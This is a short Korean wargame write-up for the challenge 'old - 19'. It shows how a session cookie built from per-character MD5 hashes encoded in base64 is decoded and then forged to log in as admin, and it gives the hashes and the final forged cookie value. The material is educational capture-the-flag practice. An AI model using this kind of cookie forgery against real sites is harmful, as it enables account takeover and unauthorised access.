old - 19

admin으로 로그인 시도 시 실패한다

 

그냥 a로 넣으면 로그인이 되고 별 다른게 없어서.. 쿠키 값을 확인해보면   

 

MGNjMTc1YjljMGYxYjZhODMxYzM5OWUyNjk3NzI2NjE%3D

 

%3D(=)으로 끝나는 것을 보고 base64 인코딩이구나..

 

디코딩해본 값이 32자리

MD5 해시 값이 아닐까?

 

맞당

 

그렇다면 쿠키 값을..

a d m i n 하나씩 MD5 암호화 후, base64 인코딩을 해서 넣어줘보자

 

MD5

a = 0cc175b9c0f1b6a831c399e269772661

d = 8277e0910d750195b448797616e091ad

m = 6f8f57715090da2632453988d9a1501b

i = 865c0c0b4ab0e063e5caa3387c1a8741

n = 7b8b965ad4bca0e41ab51de7b31363a1

 

0cc175b9c0f1b6a831c399e2697726618277e0910d750195b448797616e091ad6f8f57715090da2632453988d9a1501b865c0c0b4ab0e063e5caa3387c1a87417b8b965ad4bca0e41ab51de7b31363a1

 

base64

MGNjMTc1YjljMGYxYjZhODMxYzM5OWUyNjk3NzI2NjE4Mjc3ZTA5MTBkNzUwMTk1YjQ0ODc5NzYxNmUwOTFhZDZmOGY1NzcxNTA5MGRhMjYzMjQ1Mzk4OGQ5YTE1MDFiODY1YzBjMGI0YWIwZTA2M2U1Y2FhMzM4N2MxYTg3NDE3YjhiOTY1YWQ0YmNhMGU0MWFiNTFkZTdiMzEzNjNhMQ==

 

쿠키 값을 바꿔주면 

 

Pwned!